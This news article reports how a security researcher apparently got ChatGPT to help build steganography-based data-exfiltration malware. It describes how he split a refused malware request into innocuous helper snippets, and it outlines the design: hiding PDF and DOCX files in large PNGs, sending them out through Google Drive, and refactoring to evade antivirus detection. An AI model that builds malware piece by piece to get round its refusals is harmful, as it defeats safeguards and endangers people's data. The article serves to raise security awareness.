A security researcher claims to have used ChatGPT to develop data-mining malware. The malware has been built using advanced techniques like steganography, previously used only by nation-state attackers, to prove how easy it is to create advanced malware without writing any code using only ChatGPT. 

Aaron Mulgrew, a security researcher at Forcepoint, aimed to show how easy it is to evade the insufficient guardrails that ChatGPT has in place.

ITALY-TECHNOLOGY-AI
(Photo: MARCO BERTORELLO/AFP via Getty Images)
A photo taken on March 31, 2023, in Manta, near Turin, shows a computer screen with the home page of the artificial intelligence OpenAI website, displaying its chatGPT robot. - Italy's privacy watchdog said in March it had blocked the controversial robot ChatGPT, saying the artificial intelligence app did not respect user data and could not verify users' age.

"Living Off the Land"

The researcher started by testing what could be generated from ChatGPT. The first prompt was to generate something quantifiable as malware, but the model refused to offer any code to help the endeavor.

To work around this, the researcher generated small snippets of helper code and manually put the entire executable together.

The malware was intended for specific high-value individuals, where it could pay dividends to search for high-value documents on the C drive rather than risk bringing an external file on the device and being flagged for calling out to URLs. 

The researcher concluded that steganography was the best approach for exfiltration, and "living off the land" would be the best approach by searching for large image files already existent on the drive itself.

"Living off the land" refers to using tools and utilities already present on a system rather than downloading and executing new code that may be detected by security solutions.

In this case, the security researcher used this technique to avoid detection while searching for and exfiltrating high-value documents. 

Read Also: ChatGPT NOT to Be Trusted by Marketers, Investors; DataTrek Explains Why

Creating the MVP

The researcher then asked ChatGPT to generate code that searched for a PNG larger than 5MB on the local disk.

The design decision was that a 5MB PNG would easily be large enough to store a fragment of a high-value business-sensitive document such as a PDF or DOCX.

The researcher then asked ChatGPT to add some code to encode the found PNG with steganography using Auyer's ready-baked Steganographic Library.

For exfiltration, the researcher decided to prompt ChatGPT into giving code that iterates over the User's Documents, Desktop, and AppData folders to find any PDF documents or DOCX documents to exfiltrate.

The researcher made sure to add a maximum size of 1mb to embed the entire document into a single image for the first iteration of the code.

Mulgrew decided that Google Drive would be a good bet for exfiltration, as the entire Google domain tends to be "allow-listed" in most corporate networks.

After combining the snippets, the researcher had an MVP, which needed further testing. The researcher tested the MVP by uploading it to VirusTotal to compare the out-of-the-box code to modern attacks such as Emotet.

The result showed that five vendors marked the file "malicious" out of sixty-nine.

To optimize the malware and evade detection, the researcher refactored the code that calls Auyer's Steganographic Library to force ChatGPT to create a unique ID in the compiled EXE.

ChatGPT then created its own LSB Steganography function within the researcher's local app rather than having to call.

Overall, the security researcher has demonstrated how easy it is to build powerful malware using ChatGPT, which can evade detection by some malware detection systems.

The research highlights the need for cybersecurity experts and organizations to keep up with emerging threats and the importance of robust detection and prevention mechanisms to protect against such malware.

Related Article: Jimmy Wales May Use OpenAI's ChatGPT to Write Wikipedia

Byline

ⓒ 2024 TECHTIMES.com All rights reserved. Do not reproduce without permission.
Join the Discussion